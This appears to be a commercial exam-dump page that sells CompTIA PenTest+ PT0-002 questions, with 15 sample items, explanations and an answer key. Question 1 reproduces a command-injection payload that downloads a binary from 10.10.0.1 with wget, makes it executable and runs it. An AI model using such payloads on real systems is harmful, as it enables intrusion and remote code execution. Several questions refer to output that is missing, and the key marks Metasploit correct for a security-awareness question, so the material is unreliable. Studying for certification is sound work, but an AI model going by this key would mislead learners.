Leads4Pass provides the latest CompTIA PT0-002 actual free exam questions online practice here, replacing your time-wasting searching for exam practice materials everywhere.
Leads4Pass PT0-002 Actual exam materials: https://www.leads4pass.com/pt0-002.html simulate real exams and contain 403 latest Actual exam questions with accurate answers and problem analysis to help you prepare for the real certification exam.
Highlights:
- Actual exam questions
- Leads4Pass is the leader in IT certification exams
- Candidate satisfaction with online practice is on the rise, with more of them going to Leads4Pass to download more exam materials
The free online practice of the latest CompTIA PT0-002 Actual exam questions
| Number of exam questions | Provider | Verify answer | Related |
| 403 Q&A | Leads4Pass | Click to view | A+, Cysa+, Cloud+ … |
Question 1:
A penetration tester could gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = “POST “
exploit += “/cgi-bin/index.cgi?action=loginandPath=%27%0A/bin/sh${IFS} ?
c${IFS}\’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache\’%0A%27andloginUser=aandPwd=a”
exploit += “HTTP/1.1”
Which of the following commands should the penetration tester run post-engagement?
A. grep -v apache ~/.bash_history > ~/.bash_history
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. task kill /IM “Apache” /F
PS. The correct answer is provided at the end of the article
Answer analysis:
The exploit code is a command injection attack that uses a vulnerable CGI script to execute arbitrary commands on the target system. The commands are cd /tmp: change the current directory to /tmp wget http://10.10.0.1/apache: download a file named apache from http://10.10.0.1 chmod 777 apache: change the permissions of the file to allow read, write, and execute for everyone ./apache: run the file as an executable The file apache is most likely a malicious payload that gives the attacker remote access to the system or performs some other malicious action.
Therefore, the penetration tester should run the command rm -rf /tmp/apache post-engagement to remove the file and its traces from the system. The other commands are not effective or relevant for this purpose.
Question 2:
SIMULATION A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets. INSTRUCTIONS Select the appropriate answer(s), given the output from each section. Output 1
A. Check the answer in the explanation.
Correct Answer: A
Question 3:
A penetration tester develops exploits to attack multiple versions of a common software package. The versions have different menus and )ut.. they have a common log-in screen that the exploit must use. The penetration tester develops code to perform the log-in that can be each of the exploits targeted to a specific version. Which of the following terms is used to describe this common log-in code example?
A. Conditional
B. Library
C. Dictionary
D. Sub application
PS. The correct answer is provided at the end of the article
Answer analysis:
The term that is used to describe the common log-in code example is a library, which is a collection of reusable code or functions that can be imported or called by other programs or scripts. A library can help simplify or modularize the code development process by providing common or frequently used functionality that can be shared across different programs or scripts. In this case, the penetration tester develops a library of code to perform the log-in that can be imported or called by each of the exploits targeted to a specific version of the software package.
The other options are not valid terms that describe the common log-in code example. Conditional is a programming construct that executes a block of code based on a logical condition or expression, such as if-else statements.
The dictionary is a data structure that stores key-value pairs, where each key is associated with a value, such as a Python dictionary. Sub-application is not a standard programming term, but it may refer to an application that runs within another application, such as a web application.
Question 4:
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company\’s employees.
Which of the following tools can help the tester achieve this goal?
A. Metasploit
B. Hydra
C. SET D. WPScan
PS. The correct answer is provided at the end of the article
Question 5:
A penetration tester runs a scan against a server and obtains the following output: 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-12-20 09:23AM 331 index.aspx | ftp-syst: 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2012 Std 3389/tcp open ssl/ms-wbt-server | rdp-ntlm-info: | Target Name: WEB3 | NetBIOS_Computer_Name: WEB3 | Product_Version: 6.3.9600 |_ System_Time: 2021-01-15T11:32:06+00:00 8443/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: IIS Windows Server Which of the following command sequences should the penetration tester try NEXT?
A. ftp 192.168.53.23
B. smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 –U guest
C. crack –u Administrator –P 15worst_passwords.txt –p RDP 192.168.53.23
D. curl –X TRACE https://192.168.53.23:8443/index.aspx
E. nmap –-script vuln –sV 192.168.53.23
PS. The correct answer is provided at the end of the article
Question 6:
A penetration tester issues the following command after obtaining a shell:
Which of the following describes this technique?
A. Establishing a backdoor
B. Privilege escalation
C. PowerShell remoting
D. Living-off-the-land
PS. The correct answer is provided at the end of the article
Question 7:
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester can query the provider\’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?
A. Cross-site request forgery
B. Server-side request forgery
C. Remote file inclusion
D. Local file inclusion
PS. The correct answer is provided at the end of the article
Answer analysis:
Server-side request forgery (SSRF) is the vulnerability that the tester exploited by querying the provider\’s metadata and getting the credentials used by the instance to authenticate itself. SSRF is a type of attack that abuses a web application to make requests to other resources or services on behalf of the web server. This can allow an attacker to access internal or external resources that are otherwise inaccessible or protected. In this case, the tester was able to access the metadata service of the cloud provider, which contains sensitive information about the instance, such as credentials, IP addresses, roles, etc.
Reference: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
Question 8:
The results of an Nmap scan are as follows:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 EST
Nmap scan report for ( 10.2.1.22 )
The host is up (0.0102s latency).
Not shown: 998 filtered ports
Port State Service
80/tcp open HTTP
|_http-title: 80F 22% RH 1009.1MB (text/html)
|_http-slowloris-check:
| VULNERABLE:
| Slowloris DoS Attack
| <..>
Device type: bridge|general purpose
Running (JUST GUESSING): QEMU (95%)
OS CPE: cpe:/a:qemu:qemu
No exact OS matches were found for the host (test conditions non-ideal).
OS detection was performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds
Which of the following device types will MOST likely have a similar response? (Choose two.)
A. Network device
B. Public-facing web server
C. Active Directory domain controller
D. IoT/embedded device
E. Exposed RDP
F. Print queue
PS. The correct answer is provided at the end of the article
https://www.netscout.com/what-is-ddos/slowloris-attacks From the HTTP title in the output, this looks like an IoT device with RH implying Relative Humidity, which offers a web-based interface for visualizing the results.
Question 9:
Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?
A. The team exploits a critical server within the organization.
B. The team exfiltrates PII or credit card data from the organization.
C. The team loses access to the network remotely.
D. The team discovers another actor on a system on the network.
PS. The correct answer is provided at the end of the article
Question 10:
A consultant is reviewing the following output after reports of intermittent connectivity issues:
(192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
(192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]
(192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]
(192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]
(192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
(192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
(224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]
(239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet]
Which of the following is MOST likely to be reported by the consultant?
A. A device on the network has an IP address in the wrong subnet.
B. A multicast session was initiated using the wrong multicast group.
C. An ARP flooding attack uses the broadcast address to perform DDoS.
D. A device on the network has poisoned the ARP cache.
PS. The correct answer is provided at the end of the article
The gateway for the network (192.168.1.1) is at 0a:d1:fa:b1:01:67, and then, another machine (192.168.1.136) also claims to be on the same MAC address.
With this on the same network, intermittent connectivity will be inevitable as long as the gateway remains unreachable on the IP known by the other machines on the network and given that the new machine claiming to be the gateway has not been configured to route traffic.
The output shows an ARP table that contains entries for IP addresses and their corresponding MAC addresses on a local network interface (en0). ARP stands for Address Resolution Protocol and is used to map IP addresses to MAC addresses on a network.
However, one entry in the table is suspicious:
? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet] This entry has the same MAC address as another entry:
? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet] This indicates that a device on the network has poisoned the ARP cache by sending false ARP replies that associate its MAC address with multiple IP addresses, including 192.168.1.136 and 192.168.1.1 (which is likely the gateway address). This allows the device to intercept or redirect traffic intended for those IP addresses.
Question 11:
A penetration tester discovers passwords in a publicly available data breach during the reconnaissance phase of the penetration test. Which of the following is the best action for the tester to take?
A. Add the passwords to an appendix in the penetration test report.
B. Do nothing. Using passwords from breached data is unethical.
C. Contact the client and inform them of the breach.
D. Use the passwords in a credential stuffing attack when the external penetration test begins.
PS. The correct answer is provided at the end of the article
Answer analysis:
Upon discovering passwords in a publicly available data breach during the reconnaissance phase, the most ethical and constructive action for the penetration tester is to contact the client and inform them of the breach.
This approach allows the client to take necessary actions to mitigate any potential risks, such as forcing password resets or enhancing their security measures.
Adding the passwords to a report appendix (option A) without context or action could be seen as irresponsible while doing nothing
(option B) neglects the tester\’s duty to inform the client of potential threats. Using the passwords in a credential stuffing attack
(option D) without explicit permission as part of an agreed testing scope would be unethical and potentially illegal.
Question 12:
Within a Python script, a line that states print (var) outputs the following:
[{\’1\’ : \’CentOS\’, \’2\’ : \’Ubuntu\’), {\’1\’ : \’Windows 10\’, \’2\’ : \’Windows Server 2016\’}]
Which of the following objects or data structures is var ?
A. An array
B. A class
C. A dictionary
D. A list
PS. The correct answer is provided at the end of the article
Answer analysis:
A list is a data structure in Python that can store multiple values of different types in a sequential order. A list is created by enclosing the values in square brackets [ ] and separating them by commas. A list can also contain other lists as its elements, creating a nested or multidimensional list. The output of the print (var) statement shows that var is a list that contains two elements, each of which is another list with two key-value pairs. The key-value pairs are enclosed in curly braces { }, which indicate that they are dictionaries, another data structure in Python that maps keys to values. Therefore, var is a list of dictionaries.
Question 13:
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?
A. Ensure the client has signed the SOW.
B. Verify the client has granted network access to the hot site.
C. Determine if the failover environment relies on resources not owned by the client.
D. Establish communication and escalation procedures with the client.
PS. The correct answer is provided at the end of the article
Answer analysis:
The statement of work (SOW) is a document that defines the scope, objectives, deliverables, and timeline of a penetration testing engagement. It is important to have the client sign the SOW before starting the assessment to avoid any legal or contractual issues.
Question 14:
A penetration tester is conducting a penetration test and discovers a vulnerability on a web server that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell. Enumerating the server for privilege escalation, the tester discovers the following:
Which of the following should the penetration tester do NEXT?
A. Close the reverse shell the tester is using.
B. Note this finding for inclusion in the final report.
C. Investigate the high-numbered port connections.
D. Contact the client immediately.
PS. The correct answer is provided at the end of the article
Answer analysis:
The image shows the output of the netstat -antu command, which displays active internet connections for the TCP and UDP protocols.
The output shows that there are four established TCP connections and two listening UDP connections on the host. The established TCP connections have high-numbered ports as their local addresses, such as 49152, 49153, 49154, and 49155.
These ports are in the range of ephemeral ports, which are dynamically assigned by the operating system for temporary use by applications or processes. The foreign addresses of these connections are also high-numbered ports, such as 4433, 4434, 4435, and 4436.
These ports are not well-known or registered ports for any common service or protocol. The combination of high-numbered ports for both local and foreign addresses suggests that these connections are suspicious and may indicate a backdoor or a covert channel on the host.
Therefore, the penetration tester should investigate these connections next to determine their nature and purpose. The other options are not appropriate actions for the penetration tester at this stage.
Question 15:
Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)
A. The CVSS score of the finding
B. The network location of the vulnerable device
C. The vulnerability identifier
D. The client acceptance form
E. The name of the person who found the flaw
F. The tool used to find the issue
PS. The correct answer is provided at the end of the article
…
Verify answer:
| Q1 | Q2 | Q3 | Q4 | Q5 | Q6 | Q7 | Q8 | Q9 | Q10 | Q11 | Q12 | Q13 | Q14 | Q15 |
| B | A | B | A | A | D | B | BD | D | D | C | D | A | C | CF |
Summarize:
Leads4Pass PT0-002 Actual exam materials simulate real exams and contain 403 latest Actual exam questions with accurate answers and problem analysis to help you prepare for the real certification exam.
Download Leads4Pass PT0-002 Actual exam questions and answers with PDF and VCE: https://www.leads4pass.com/pt0-002.html, easy success!
